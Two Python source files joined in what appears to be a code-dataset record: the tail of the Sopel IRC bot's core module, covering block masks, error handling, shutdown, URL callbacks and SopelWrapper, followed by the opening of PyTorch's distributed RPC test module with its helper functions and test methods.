# functions that weren't going to run anyway
if blocked and not func.unblockable and not trigger.admin:
function_name = "%s.%s" % (
func.__module__, func.__name__
)
list_of_blocked_functions.append(function_name)
continue
# call triggered function
wrapper = SopelWrapper(self, trigger)
if func.thread:
targs = (func, wrapper, trigger)
t = threading.Thread(target=self.call, args=targs)
t.start()
else:
self.call(func, wrapper, trigger)
if list_of_blocked_functions:
if nick_blocked and host_blocked:
block_type = 'both'
elif nick_blocked:
block_type = 'nick'
else:
block_type = 'host'
LOGGER.info(
"[%s]%s prevented from using %s.",
block_type,
nick,
', '.join(list_of_blocked_functions)
)
def on_scheduler_error(self, scheduler, exc):
"""Called when the Job Scheduler fails.
.. seealso::
:meth:`error`
"""
self.error(exception=exc)
def on_job_error(self, scheduler, job, exc):
"""Called when a job from the Job Scheduler fails.
.. seealso::
:meth:`error`
"""
self.error(exception=exc)
def error(self, trigger=None, exception=None):
"""Called internally when a plugin causes an error."""
message = 'Unexpected error'
if exception:
message = '{} ({})'.format(message, exception)
if trigger:
message = '{} from {} at {}. Message was: {}'.format(
message, trigger.nick, str(datetime.now()), trigger.group(0)
)
LOGGER.exception(message)
if trigger and self.settings.core.reply_errors and trigger.sender is not None:
self.say(message, trigger.sender)
def _host_blocked(self, host):
bad_masks = self.config.core.host_blocks
for bad_mask in bad_masks:
bad_mask = bad_mask.strip()
if not bad_mask:
continue
if (re.match(bad_mask + '$', host, re.IGNORECASE) or
bad_mask == host):
return True
return False
def _nick_blocked(self, nick):
bad_nicks = self.config.core.nick_blocks
for bad_nick in bad_nicks:
bad_nick = bad_nick.strip()
if not bad_nick:
continue
if (re.match(bad_nick + '$', nick, re.IGNORECASE) or
Identifier(bad_nick) == nick):
return True
return False
def _shutdown(self):
# Stop Job Scheduler
LOGGER.info('Stopping the Job Scheduler.')
self.scheduler.stop()
try:
self.scheduler.join(timeout=15)
except RuntimeError:
LOGGER.exception('Unable to stop the Job Scheduler.')
else:
LOGGER.info('Job Scheduler stopped.')
self.scheduler.clear_jobs()
# Shutdown plugins
LOGGER.info(
'Calling shutdown for %d modules.', len(self.shutdown_methods))
for shutdown_method in self.shutdown_methods:
try:
LOGGER.debug(
'Calling %s.%s',
shutdown_method.__module__,
shutdown_method.__name__)
shutdown_method(self)
except Exception as e:
LOGGER.exception('Error calling shutdown method: %s', e)
# Avoid calling shutdown methods if we already have.
self.shutdown_methods = []
def register_url_callback(self, pattern, callback):
"""Register a ``callback`` for URLs matching the regex ``pattern``.
:param pattern: compiled regex pattern to register
:type pattern: :ref:`re.Pattern <python:re-objects>`
:param callback: callable object to handle matching URLs
:type callback: :term:`function`
.. versionadded:: 7.0
This method replaces manual management of ``url_callbacks`` in
Sopel's plugins, so instead of doing this in ``setup()``::
if 'url_callbacks' not in bot.memory:
bot.memory['url_callbacks'] = tools.SopelMemory()
regex = re.compile(r'http://example.com/path/.*')
bot.memory['url_callbacks'][regex] = callback
use this much more concise pattern::
regex = re.compile(r'http://example.com/path/.*')
bot.register_url_callback(regex, callback)
"""
if 'url_callbacks' not in self.memory:
self.memory['url_callbacks'] = tools.SopelMemory()
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
self.memory['url_callbacks'][pattern] = callback
def unregister_url_callback(self, pattern):
"""Unregister the callback for URLs matching the regex ``pattern``.
:param pattern: compiled regex pattern to unregister callback
:type pattern: :ref:`re.Pattern <python:re-objects>`
.. versionadded:: 7.0
This method replaces manual management of ``url_callbacks`` in
Sopel's plugins, so instead of doing this in ``shutdown()``::
regex = re.compile(r'http://example.com/path/.*')
try:
del bot.memory['url_callbacks'][regex]
except KeyError:
pass
use this much more concise pattern::
regex = re.compile(r'http://example.com/path/.*')
bot.unregister_url_callback(regex)
"""
if 'url_callbacks' not in self.memory:
# nothing to unregister
return
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
try:
del self.memory['url_callbacks'][pattern]
except KeyError:
pass
def search_url_callbacks(self, url):
"""Yield callbacks found for ``url`` matching their regex pattern.
:param str url: URL found in a trigger
:return: yield 2-value tuples of ``(callback, match)``
For each pattern that matches the ``url`` parameter, it yields a
2-value tuple of ``(callable, match)`` for that pattern.
The ``callable`` is the one registered with
:meth:`register_url_callback`, and the ``match`` is the result of
the regex pattern's ``search`` method.
.. versionadded:: 7.0
.. seealso::
The Python documentation for the `re.search`__ function and
the `match object`__.
.. __: https://docs.python.org/3.6/library/re.html#re.search
.. __: https://docs.python.org/3.6/library/re.html#match-objects
"""
if 'url_callbacks' not in self.memory:
# nothing to search
return
for regex, function in tools.iteritems(self.memory['url_callbacks']):
match = regex.search(url)
if match:
yield function, match
def restart(self, message):
"""Disconnect from IRC and restart the bot."""
self.wantsrestart = True
self.quit(message)
class SopelWrapper(object):
"""Wrapper around a Sopel instance and a Trigger
:param sopel: Sopel instance
:type sopel: :class:`~sopel.bot.Sopel`
:param trigger: IRC Trigger line
:type trigger: :class:`sopel.trigger.Trigger`
This wrapper will be used to call Sopel's triggered commands and rules as
their ``bot`` argument. It acts as a proxy to :meth:`send messages<say>` to
the sender (either a channel or in a private message) and even to
:meth:`reply to someone<reply>` in a channel.
"""
def __init__(self, sopel, trigger):
# The custom __setattr__ for this class sets the attribute on the
# original bot object. We don't want that for these, so we set them
# with the normal __setattr__.
object.__setattr__(self, '_bot', sopel)
object.__setattr__(self, '_trigger', trigger)
def __dir__(self):
classattrs = [attr for attr in self.__class__.__dict__
if not attr.startswith('__')]
return list(self.__dict__) + classattrs + dir(self._bot)
def __getattr__(self, attr):
return getattr(self._bot, attr)
def __setattr__(self, attr, value):
return setattr(self._bot, attr, value)
def say(self, message, destination=None, max_messages=1):
"""Override ``Sopel.say`` to send message to sender
:param str message: message to say
:param str destination: channel or person; defaults to trigger's sender
:param int max_messages: max number of message splits
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
.. seealso::
:meth:`sopel.bot.Sopel.say`
"""
if destination is None:
destination = self._trigger.sender
self._bot.say(message, destination, max_messages)
def action(self, message, destination=None):
"""Override ``Sopel.action`` to send action to sender
:param str message: action message
:param str destination: channel or person; defaults to trigger's sender
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
.. seealso::
:meth:`sopel.bot.Sopel.action`
"""
if destination is None:
destination = self._trigger.sender
self._bot.action(message, destination)
def notice(self, message, destination=None):
"""Override ``Sopel.notice`` to send a notice to sender
:param str message: notice message
:param str destination: channel or person; defaults to trigger's sender
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
.. seealso::
:meth:`sopel.bot.Sopel.notice`
"""
if destination is None:
destination = self._trigger.sender
self._bot.notice(message, destination)
def reply(self, message, destination=None, reply_to=None, notice=False):
"""Override ``Sopel.reply`` to reply to someone
:param str message: reply message
:param str destination: channel or person; defaults to trigger's sender
:param str reply_to: person to reply to; defaults to trigger's nick
:param bool notice: reply as an IRC notice or with a simple message
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
``reply_to`` will default to the nickname who sent the trigger.
.. seealso::
:meth:`sopel.bot.Sopel.reply`
"""
if destination is None:
destination = self._trigger.sender
if reply_to is None:
reply_to = self._trigger.nick
self._bot.reply(message, destination, reply_to, notice)
def kick(self, nick, channel=None, message=None):
"""Override ``Sopel.kick`` to kick in a channel
:param str nick: nick to kick out of the ``channel``
:param str channel: optional channel to kick ``nick`` from
:param str message: optional message for the kick
The ``channel`` will default to the channel in which the call was
triggered. If triggered from a private message, ``channel`` is
required.
.. seealso::
:meth:`sopel.bot.Sopel.kick`
"""
if channel is None:
if self._trigger.is_privmsg:
raise RuntimeError('Error: KICK requires a channel.')
else:
channel = self._trigger.sender
if nick is None:
raise RuntimeError('Error: KICK requires a nick.')
self._bot.kick(nick, channel, message)
|
rpc_test.py | import concurrent.futures
import contextlib
import json
import os
import sys
import threading
import time
from collections import namedtuple
from functools import partial
from threading import Event
from threading import Lock
from unittest import mock
import torch
import torch.nn as nn
import torch.distributed as dist
import torch.distributed.rpc as rpc
import torch.distributed.autograd as dist_autograd
from torch.distributed.rpc import RRef, _get_debug_info, _rref_context_get_debug_info, WorkerInfo
from torch.distributed.rpc.api import _delete_all_user_and_unforked_owner_rrefs, _use_rpc_pickler, _thread_local_var, _wait_all
from torch.distributed.rpc.internal import (
PythonUDF,
RPCExecMode,
_internal_rpc_pickler,
_build_rpc_profiling_key,
)
from torch.futures import Future
from torch.testing._internal.common_distributed import (
skip_if_lt_x_gpu,
captured_output,
)
from torch.testing._internal.common_utils import (
IS_MACOS,
load_tests,
sandcastle_skip_if,
get_cycles_per_ms,
)
from torch.testing._internal.dist_utils import (
dist_init,
get_function_event,
initialize_pg,
wait_until_node_failure,
wait_until_pending_futures_and_users_flushed,
wait_until_owners_and_forks_on_rank,
worker_name,
)
from torch.testing._internal.distributed.rpc.rpc_agent_test_fixture import (
RpcAgentTestFixture,
)
from torch.testing._internal.common_utils import TemporaryFileName
from torch.autograd.profiler_legacy import profile as _profile
def foo_add():
return torch.add(torch.ones(1), torch.ones(1))
def udf_with_torch_ops(device=-1, use_record_function=False):
device_ctx = contextlib.suppress() if device == -1 else torch.cuda.device(device)
record_function_ctx = (
torch.autograd.profiler.record_function("##forward##")
if use_record_function
else contextlib.suppress()
)
with device_ctx, record_function_ctx:
t1, t2 = torch.ones(1), torch.ones(1)
t = torch.add(t1, t2)
t = torch.mul(t, t)
t = t.relu()
t = t.sigmoid()
# Events (operator invocations) that are expected to be ran as part of the above
# function.
EXPECTED_REMOTE_EVENTS = [
"aten::ones",
"aten::ones",
"aten::add",
"aten::mul",
"aten::relu",
"aten::clamp_min",
"aten::sigmoid",
]
# Remote operations are prefixed with the following string for RPC profiling.
REMOTE_OP_STR = "#remote_op: "
VALUE_FUTURE = concurrent.futures.Future()
DONE_FUTURE = concurrent.futures.Future()
FIFTY_MIL_CYCLES = 50000000
_rpc_barrier_count = 0
def _increment_count():
global _rpc_barrier_count
_rpc_barrier_count += 1
def _reset_count():
global _rpc_barrier_count
_rpc_barrier_count = 0
class StubRpcAgent:
def __init__(self, world_size):
self.world_size = world_size
def get_worker_infos(self):
return {
WorkerInfo(name=worker_name(rank), id=rank)
for rank in range(self.world_size)
}
def _stub_construct_rpc_backend_options_handler(**kwargs):
return mock.Mock() # RpcBackendOptions.
def _stub_init_rpc_backend_handler(store, name, rank, world_size, rpc_backend_options):
return StubRpcAgent(world_size=world_size)
def set_value(value):
VALUE_FUTURE.set_result(value)
def wait_for_value_future():
return VALUE_FUTURE.result()
def set_and_check_done(value):
VALUE_FUTURE.set_result(value)
return DONE_FUTURE.result()
# it is used to test python user defined function over rpc
# classes and functions are used to test python user defined class and
# methods over rpc
TensorClass = namedtuple("TensorClass", ["tensors"])
class MyPickleClass:
def __init__(self):
self.t = None
def __getstate__(self):
(pickled_python_udf, tensors) = _internal_rpc_pickler.serialize(
PythonUDF(my_tensor_function, (torch.ones(2, 2), torch.ones(2, 2)), None)
)
return (pickled_python_udf, tensors)
def __setstate__(self, obj):
python_udf = _internal_rpc_pickler.deserialize(obj[0], obj[1])
result = python_udf.func(python_udf.args[0], python_udf.args[1])
self.t = result
def set(self, val):
self.t = val
class SlowPickleClass:
def __init__(self, t):
self.t = t
def __getstate__(self):
time.sleep(self.t)
return (self.t, )
def __setstate__(self, obj):
self.t = obj[0]
time.sleep(self.t)
class MyClass:
def __init__(self, a, delay=False):
self.a = a
# delay initialization to simulate errors if specified
if delay:
time.sleep(2)
def my_instance_method(self, b):
return self.a + b
@classmethod
def my_class_method(cls, d, e):
return d + e
@staticmethod
def my_static_method(f):
return f > 10
def increment_value(self, increment):
self.a += increment
def get_value(self):
return self.a
def my_slow_method(self, my_tensor_arg):
time.sleep(5)
return torch.add(self.a, my_tensor_arg)
def _call_method_on_rref(method, rref, *args, **kwargs):
return method(rref.local_value(), *args, **kwargs)
def get_rref_list(values):
return [RRef(MyClass(a)) for a in values]
def add_rref_to_value(rref, value):
return rref.to_here() + value
def run_nested_pickle(pickle_cls_instance, tensor):
return pickle_cls_instance.t + tensor
def build_sparse_tensor(coalesce=False):
i = [[0, 1, 1], [2, 0, 2]]
v = [3, 4, 5]
tensor = torch.sparse_coo_tensor(i, v, (2, 3))
if coalesce:
tensor = tensor.coalesce()
return tensor
def build_complex_tensors():
a = torch.ones(3, 3)
b = [a, a]
c = [b, b]
d = [a, b]
e = {a: d}
return [a, b, c, d, e]
def non_cont_test(t_view, t_cont):
if t_view.is_contiguous():
raise Exception('t_view is contiguous!')
if not t_cont.is_contiguous():
raise Exception('t_cont is not contiguous!')
if not torch.equal(t_view, t_cont):
raise Exception('t_view is not equal to t_cont!')
return t_view
def my_function(a, b, c):
return a + b + c
def my_tensor_function(a, b):
return a + b
def my_container_sum(a):
result = a[0]
for tensor in a[1:]:
result += tensor
return result
def my_sleep_func(seconds=1):
time.sleep(seconds)
return torch.mul(torch.tensor(1), torch.tensor(1))
def my_complex_tensor_function(list_input, tensor_class_input, dict_input):
res = list_input[0]
for t in list_input:
res += t
for k, v in dict_input.items():
res += v
complex_tensors = tensor_class_input.tensors
return (res, complex_tensors[0], complex_tensors[1], complex_tensors[2])
def my_rref_function(rref_a, rref_b):
return rref_a.to_here() + rref_b.to_here()
def delayed_add(a, b, seconds=0.05):
time.sleep(seconds)
return a + b
def identity(a):
return a
def no_result():
print("do nothing")
def raise_or_inc(value):
if value.numel() == 2:
raise ValueError("Expected error")
return value + 1
def nested_rpc(dst):
return rpc.rpc_sync(dst, torch.add, args=(torch.ones(2, 2), 1))
def nested_rpc_sparse(dst):
return rpc.rpc_sync(
dst,
torch.add,
args=(build_sparse_tensor(), build_sparse_tensor())
)
def multi_layer_nested_async_rpc(dst, world_size, ttl):
# this method returns immediately without blocking the callee, but will
# generate additional requests.
if ttl > 0:
current_dst = worker_name(dst)
next_dst = (dst + 1) % world_size
rpc.rpc_async(
current_dst,
multi_layer_nested_async_rpc,
args=(next_dst, world_size, ttl - 1),
)
return 0
def nested_rref(dst):
return (
rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1)),
rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 2)),
)
def nested_rref_sparse(dst):
return (
rpc.remote(
dst,
torch.add,
args=(build_sparse_tensor(), build_sparse_tensor())
),
rpc.remote(
dst,
torch.add,
args=(build_sparse_tensor(), build_sparse_tensor())
),
)
def nested_remote(dst):
rref = rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 3))
return rref.to_here()
def nested_remote_sparse(dst):
rref = rpc.remote(dst, torch.add, args=(build_sparse_tensor(), build_sparse_tensor()))
return rref.to_here()
def rref_forward_chain(dst, world_size, rref, ttl):
if ttl > 0:
current_dst = worker_name(dst)
next_dst = (dst + 1) % world_size
ret_rref = rpc.remote(
current_dst, rref_forward_chain, args=(next_dst, world_size, rref, ttl - 1)
)
return [ret_rref]
else:
return rref.to_here()
def rpc_return_rref(dst):
return rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1))
def light_rpc():
return 0
def heavy_rpc(tensor):
for i in range(1, 100):
tensor *= i
tensor /= i + 1
return 0
def heavy_rpc_sparse(tensor):
for i in range(1, 100):
tensor *= i
tensor = tensor / (i + 1)
return 0
@torch.jit.script
def heavy_rpc_torchscript(tensor):
for i in range(1, 100):
tensor *= i
tensor /= i + 1
return 0
@torch.jit.script
def my_script_func(tensor):
return torch.add(tensor, tensor)
expected_err = "Expected error"
def raise_func():
raise ValueError(expected_err)
@torch.jit.script
def raise_func_script(expected_err: str) -> torch.Tensor:
raise ValueError(expected_err)
expected_err_escape = "\nFirst line of error \n next line of error \n last line of error"
def raise_func_escape():
raise ValueError(expected_err_escape)
global_rref = None
def set_global_rref(rref):
global global_rref
global_rref = rref
def clear_global_rref():
global global_rref
global_rref = None
def check_rref_confirmed(rref):
return rref.confirmed_by_owner()
def get_rref_debug_info():
return _rref_context_get_debug_info()
def add_use_future_cb(to, x, y, z):
out = concurrent.futures.Future()
def callback(fut):
out.set_result(fut.wait() + z)
fut = rpc.rpc_async(to, torch.add, args=(x, y))
fut.then(callback)
return out.result()
def get_events_from_profile(profile_rref):
return profile_rref.local_value().process_global_function_events
def add_use_future_set_result(to, x, y, z):
out = torch.futures.Future()
fut = rpc.rpc_async(to, torch.add, args=(x, y))
fut.then(lambda fut : out.set_result(fut.wait() + z))
return out.wait()
def add_use_future_nested_cb(to, x, y, z):
out = torch.futures.Future()
def callback(fut1):
fut2 = rpc.rpc_async(to, torch.add, args=(fut1.wait(), z))
fut2.then(lambda fut2 : out.set_result(fut2.wait()))
fut1 = rpc.rpc_async(to, torch.add, args=(x, y))
fut1.then(callback)
return out.wait()
def fail_on_fut(fut):
pass
@rpc.functions.async_execution
def async_raise_func():
raise RuntimeError("Expected error")
@rpc.functions.async_execution
def async_wrong_type():
return torch.zeros(2, 2)
@rpc.functions.async_execution
def async_add(to, x, y):
return rpc.rpc_async(to, torch.add, args=(x, y))
def slow_add(x, y, device="cpu"):
time.sleep(1)
x = x.to(device)
y = y.to(device)
return torch.add(x, y).cpu()
@rpc.functions.async_execution
def slow_async_add(to, x, y, device="cpu"):
return rpc.rpc_async(to, slow_add, args=(x, y, device))
@rpc.functions.async_execution
def async_add_with_future_ctor(to, x, y, z):
fut = torch.futures.Future()
rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut1: fut.set_result(fut1.wait() + z)
)
return fut
@rpc.functions.async_execution
def async_add_chained(to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
@rpc.functions.async_execution
def async_add_chained_multi(to, x, num, step):
fut = rpc.rpc_async(to, torch.add, args=(x, 0))
for _ in range(num):
fut = fut.then(lambda fut: fut.wait() + step)
return fut
@rpc.functions.async_execution
def async_add_nested(to, x, y, z):
return rpc.rpc_async(to, async_add, args=(to, x, y)).then(
lambda fut: fut.wait() + z
)
@rpc.functions.async_execution
def async_add_multi_fanout(to, x, num, step):
futs = []
for i in range(num):
if i == 0:
futs.append(rpc.rpc_async(to, torch.add, args=(x, step)))
else:
futs.append(rpc.rpc_async(to, torch.add, args=(0, step)))
# TODO: use torch.futures.collect_all
lock = Lock()
state = {"cnt": 0, "ret": torch.zeros_like(x)}
ret_future = torch.futures.Future()
def inc_and_set(fut):
with lock:
state["cnt"] += 1
state["ret"] += fut.wait()
if state["cnt"] >= len(futs):
ret_future.set_result(state["ret"])
for fut in futs:
fut.then(inc_and_set)
return ret_future
@rpc.functions.async_execution
def async_cuda_sleep_and_set_to_one(t):
device = t.device
original_stream = torch.cuda.current_stream(device)
new_stream = torch.cuda.Stream(device)
new_stream.wait_stream(original_stream)
with torch.cuda.stream(new_stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
t.fill_(1)
fut = Future(devices=[device])
fut.set_result(t)
return fut
@rpc.functions.async_execution
def async_cuda_nested_add(to, x, y, z):
def cb(fut):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
return fut.value() + z
return rpc.rpc_async(to, torch.add, args=(x, y)).then(cb)
# A custom Python class that contains a tensor, needed to see if we correctly
# use the Python pickler to extract tensors from non-IValue-convertible types.
class TensorWrapper:
__slots__ = ("tensor", "lock", "event", "thread")
def __init__(self, t):
self.tensor = t
# Add one non-picklable field, to ensure it's ignored/skipped.
self.lock = Lock()
self.event = torch.cuda.Event(enable_timing=True)
self.thread = threading.Thread()
self.thread.start()
def increase(self, v):
with self.lock:
self.tensor += v
def sum(self):
with self.lock:
self.event.record()
return self.tensor.sum()
class AsyncExecutionClass:
@staticmethod
@rpc.functions.async_execution
def static_async_add(to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
@classmethod
@rpc.functions.async_execution
def class_async_add(cls, to, x, y, z):
ret_fut = torch.futures.Future()
rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: ret_fut.set_result(fut.wait() + z)
)
return ret_fut
@rpc.functions.async_execution
def bound_async_add(self, to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
def return_future():
return torch.futures.Future()
class FooBackendOptions(rpc.RpcBackendOptions):
def __init__(self, init_method):
# Must call the __init__ of the superclass (and do so directly,
# without using super()) because... pybind.
rpc.RpcBackendOptions.__init__(self)
self.init_method = init_method
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
class MyEmbeddingBagModel(torch.nn.Module):
def __init__(self, sparse):
super().__init__()
self.eb = torch.nn.EmbeddingBag(
10,
10,
sparse=sparse
)
def forward(self, x):
return self.eb(x)
class MyParameterServer:
def __init__(self, trainers):
self.lock = Lock()
self.trainers = trainers
self.iteration = 0
self.updates = 0
self.futures = []
self.total = None
self.gradient = None
@staticmethod
def get_gradient(rref):
return rref.local_value().gradient
@staticmethod
@rpc.functions.async_execution
def average(rref, riteration, tensor):
self = rref.local_value()
fut = torch.futures.Future()
with self.lock:
if riteration > self.iteration:
self.iteration = riteration
self.updates = 0
self.futures.clear()
self.futures.append(fut)
if self.total is None:
self.total = tensor
else:
self.total += tensor
self.updates += 1
if self.trainers == self.updates:
self.gradient = self.total / float(self.trainers)
for fut in self.futures:
result = self.total / float(self.trainers)
fut.set_result(result)
return fut
class RpcTestCommon():
def _run_func_in_mode(self, to, fn, mode, args=None, kwargs=None):
if mode == RPCExecMode.SYNC:
return rpc.rpc_sync(to, fn, args=args, kwargs=kwargs)
elif mode == RPCExecMode.ASYNC:
return rpc.rpc_async(to, fn, args=args, kwargs=kwargs).wait()
elif mode == RPCExecMode.REMOTE:
return rpc.remote(to, fn, args=args, kwargs=kwargs).to_here()
def _self_py_udf_remote(self, worker_info, x, y, z):
rref = rpc.remote(worker_info, my_function, args=(x, y, z))
self.assertEqual(rref.to_here(), x + y + z)
def _self_remote_rref_as_rpc_arg(self, dst, x, y, z):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(x, y, z))
fut = rpc.rpc_async(dst, add_rref_to_value, args=(rref, x))
ret = rpc.rpc_sync(dst, add_rref_to_value, args=(rref, x + y))
self.assertEqual(ret, x + y + z + x + y)
self.assertEqual(fut.wait(), x + y + z + x)
def _self_remote_rref_as_remote_arg(self, dst, x, y, z):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(x, y, z))
ret_rref = rpc.remote(dst, add_rref_to_value, args=(rref, x))
self.assertEqual(
ret_rref.to_here(), x + y + z + x
)
def _world_size_one(self, a, b):
if self.rank == 0:
rpc.init_rpc(
name="me",
backend=self.rpc_backend,
rank=0,
world_size=1,
rpc_backend_options=self.rpc_backend_options,
)
def _rpc_sync(x, y):
expect = x * 2
result = rpc.rpc_sync(
"me",
my_tensor_function,
args=(x, y)
)
self.assertEqual(expect, result)
def _rpc_async(x, y):
expect = x * 2
result = rpc.rpc_async(
"me",
my_tensor_function,
args=(x, y)
).wait()
self.assertEqual(expect, result)
def _remote(x, y):
expect = x * 2
result = rpc.remote(
"me",
my_tensor_function,
args=(x, y)
).to_here()
self.assertEqual(expect, result)
_rpc_sync(a, b)
_rpc_async(a, b)
_remote(a, b)
rpc.shutdown()
def _multi_rpc(self, sparse):
dst_rank = (self.rank + 1) % self.world_size
for i in range(20):
n = i + self.rank + 1
if sparse:
x = build_sparse_tensor() * n
y = build_sparse_tensor() * n
else:
x = torch.ones(2, 2)
y = torch.ones(2, 2)
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(x, y),
)
self.assertEqual(ret, x * 2)
def _wait_all_workers(self, f, x):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
self._run_uneven_workload(f, x)
# worker0 calls this at the end after waiting for RPC responses.
# worker1/2 calls this immediately and has some works after it.
# worker3 calls this immediately and has no more work.
rpc.api._wait_all_workers()
# Wait before proceeding to shutdown to ensure worker0 RPCs make
# it through to other workers.
dist.barrier()
rpc.shutdown(graceful=False)
def _wait_all_workers_twice(self, f, x):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
self._run_uneven_workload(f, x)
# worker0 calls this at the end after waiting for RPC responses.
# worker1/2 calls this immediately and has some works after it.
# worker3 calls this immediately and has no more work.
rpc.api._wait_all_workers()
rpc.api._wait_all_workers()
# Wait before proceeding to shutdown to ensure worker0 RPCs make
# it through to other workers.
dist.barrier()
rpc.shutdown(graceful=False)
def _nested_rpc(self, f, expected):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
f,
args=(worker_name(self.rank),),
)
self.assertEqual(ret, expected)
def _stress_test_rpc(self, f, repeat=1000, args=()):
n = self.rank + 1
dst_rank = n % self.world_size
futs = []
tik = time.time()
for _ in range(repeat):
fut = rpc.rpc_async(worker_name(dst_rank), f, args=args)
futs.append(fut)
for val in torch.futures.wait_all(futs):
self.assertEqual(val, 0)
tok = time.time()
print(
"Rank {} finished testing {} times in {} seconds.".format(
self.rank, repeat, tok - tik
)
)
def _builtin_remote_ret(self, x, y, expected):
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
torch.add,
args=(x, y),
)
self.assertEqual(rref.to_here(), expected)
def _builtin_remote_self(self, x, y, expected):
rref = rpc.remote(
worker_name(self.rank),
torch.add,
args=(x, y),
)
self.assertEqual(rref.local_value(), expected)
def _test_multi_remote_call(self, fn, sparse, args_fn=lambda x, y: (), kwargs_fn=lambda x, y: {}):
m = 10
n = self.rank + 1
dst_rank = n % self.world_size
rrefs = []
expected = []
for i in range(m):
n = n + i
rrefs.append(
rpc.remote(
worker_name(dst_rank),
fn,
args=args_fn(n, sparse),
kwargs=kwargs_fn(n, sparse),
)
)
expected.append(fn(*args_fn(n, sparse), **kwargs_fn(n, sparse)))
for i in range(m):
self.assertEqual(rrefs[i].to_here(), expected[i])
def _py_rref_args(self, a, b, x, y, expected):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), torch.add, args=(a, b)
)
rref_b = rpc.remote(
worker_name(dst_rank), torch.add, args=(x, y)
)
rref_c = rpc.remote(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), expected)
def _py_rref_args_user_share(self, a, b, c, x, y, z, expected):
n = self.rank + 1
owner_rank = n % self.world_size
user_rank = (n + 1) % self.world_size
rref_a = rpc.remote(
worker_name(owner_rank), my_function, args=(a, b, c)
)
rref_b = rpc.remote(
worker_name(owner_rank), my_function, args=(x, y, z)
)
rref_c = rpc.remote(
worker_name(user_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), expected)
def _py_rpc_rref_args(self, a, b, c, x, y, z, expected):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), my_function, args=(a, b, c)
)
rref_b = rpc.remote(
worker_name(dst_rank), my_function, args=(x, y, z)
)
c = rpc.rpc_sync(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(c, expected)
def _nested_remote(self, f, expected):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref = rpc.remote(
worker_name(dst_rank1),
f,
args=(worker_name(dst_rank2),),
)
self.assertEqual(rref.to_here(), expected)
def _nested_rref(self, f, expected1, expected2):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref_of_rrefs = rpc.remote(
worker_name(dst_rank1),
f,
args=(worker_name(dst_rank2),),
)
# Say C has 2 OwnerRRefs.
# B has 2 UserRRefs to those 2 OwnerRRefs, respectively.
# This call is effectively A asking B to share its 2 UserRRefs.
rrefs = rref_of_rrefs.to_here()
self.assertEqual(len(rrefs), 2)
self.assertEqual(rrefs[0].to_here(), expected1)
self.assertEqual(rrefs[1].to_here(), expected2)
def _nested_rref_stress(self, f, expected1, expected2):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
all_rrefs = []
for _ in range(20):
all_rrefs.append(
rpc.remote(
worker_name(dst_rank1),
f,
args=(worker_name(dst_rank2),),
)
)
for i in range(20):
rref_of_rrefs = all_rrefs[i]
rrefs = rref_of_rrefs.to_here()
self.assertEqual(len(rrefs), 2)
self.assertEqual(rrefs[0].to_here(), expected1)
self.assertEqual(rrefs[1].to_here(), expected2)
def _my_parameter_server(self, sparse):
ps_rref = RRef(MyParameterServer(self.world_size - 1))
futures = []
for index in range(1, self.world_size):
futures.append(
rpc.rpc_async(
worker_name((self.rank + index) % self.world_size),
self._trainer_func,
args=(
ps_rref,
sparse
),
)
)
torch.futures.wait_all(futures)
def _test_cuda_future_extraction(self, wrapper, unwrapper, sparse_tensor):
# We check proper CUDA stream synchronization by adding to the tensor
# in one stream to get the expected value, and reading it from another stream.
future = Future(devices=["cuda:0"])
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
another_stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
if sparse_tensor:
tensor = build_sparse_tensor().to("cuda:0")
add_tensor = build_sparse_tensor().to("cuda:0")
expected_tensor = (tensor + add_tensor).coalesce()
else:
tensor = torch.zeros((100,), device="cuda:0")
add_tensor = torch.ones((100,), device="cuda:0")
expected_tensor = tensor + add_tensor
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor += add_tensor
if sparse_tensor:
tensor = tensor.coalesce()
